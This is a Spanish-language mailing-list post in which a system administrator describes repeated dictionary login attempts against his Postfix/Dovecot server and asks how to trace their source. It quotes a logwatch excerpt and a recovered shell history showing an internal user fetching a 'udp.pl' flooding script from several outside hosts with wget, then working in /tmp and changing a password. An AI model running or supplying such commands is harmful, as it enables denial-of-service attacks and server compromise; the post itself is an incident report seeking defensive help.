Buenos días a todos de la lista: Primero que nada les cuento la experiencia que estoy pasando con mi servidor de correos (postfix,dovecot+sasl), hace un mes aproximadamente he notado que el servidor a las 5:00PM es atacado/escaneado o algo asi tratando de conectarse al dovecot especificamente ,les posteo lo que sale...--------------------- pam_unix Begin ------------------------
dovecot:
Authentication Failures:
contacto rhost=66.142.38.137 : 88 Time(s)
teste rhost=66.142.38.137 : 88 Time(s)
basura rhost=66.142.38.137 : 65 Time(s)
renata rhost=66.142.38.137 : 65 Time(s)
financeiro rhost=66.142.38.137 : 64 Time(s)
biblioteca rhost=66.142.38.137 : 62 Time(s)
bodega rhost=66.142.38.137 : 62 Time(s)
licita rhost=66.142.38.137 : 62 Time(s)
clientes rhost=66.142.38.137 : 61 Time(s)
contabilidad rhost=66.142.38.137 : 59 Time(s)
estudio rhost=66.142.38.137 : 59 Time(s)
mrivera rhost=66.142.38.137 : 58 Time(s)
patricio rhost=66.142.38.137 : 58 Time(s)
prueba rhost=66.142.38.137 : 58 Time(s)
usuario rhost=66.142.38.137 : 58 Time(s)
turismo rhost=66.142.38.137 : 57 Time(s) .......... ................. ............(hay mas resgisto q no lo pongo es bastante todos salen de la misma ip) Unknown Entries:
check pass; user unknown: 3901 Time(s) Al parecer es un diccionario que prueba esos usuarios para ingresar al dovecot o bien al postfix.esto ya me pasa desde ya hace un mes y no puedo detectar como y donde se ejecuta, pero si averigue que hicieron y que se bajaron para realizar esto. el cual detallo, yo uso un Centos 6.0 64 bits, fue un usuario interno con conocimiento basicos de linux ( al menos eso creo ) se conecto y hizo eso, (lo saque del history)wget http://y2khom3.evonet.ro/udp.plwget www.buble.biz/alinftp/udp.plwget www.packetstormsecurity.org/DoS/udp.plping www.google.com.peps xcd /tmpls -awpasswd mcondeexit El detalle es que desde ese momento ya tengo el problema que les comente lineas arriba.. a alguien de ustedes la ha pasado de casualidad lo mismo? espero me puedan alguna señal de como detectar de donde se ejecuta dicho escaneo .si esta en mi server y siempre se ejecuta a esa hora?? o es un scaneo externo. Saludos Luis Roman